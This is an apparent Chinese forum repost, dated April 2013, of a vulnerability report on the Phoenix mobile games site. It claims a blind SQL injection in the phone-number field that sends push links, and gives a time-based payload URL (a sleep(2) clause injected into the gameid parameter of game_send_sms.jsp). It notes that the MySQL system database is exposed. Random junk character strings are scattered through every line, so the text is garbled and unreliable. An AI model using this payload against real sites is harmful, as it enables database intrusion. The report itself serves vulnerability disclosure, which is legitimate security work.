简要描述:/ |* Q, s" ]0 ^
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。! C) W' ?; {6 M6 s, X
4 I/ m1 _8 o5 s* H/ d) t& B详细说明:0 d2 _3 m/ K6 F6 W/ c
存在SQL盲注url:
5 h9 H& Y6 R0 \; a+ N! Yfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
' Q4 o( @% ?0 W% a% M' ~http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png( d1 L5 O i: P7 J3 H5 E! d
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png; [1 H ^8 p# @- e' |
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
, ~ [6 ?5 P ~( {2 C# y4 L+ H9 C1 u) Z4 M: O y
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对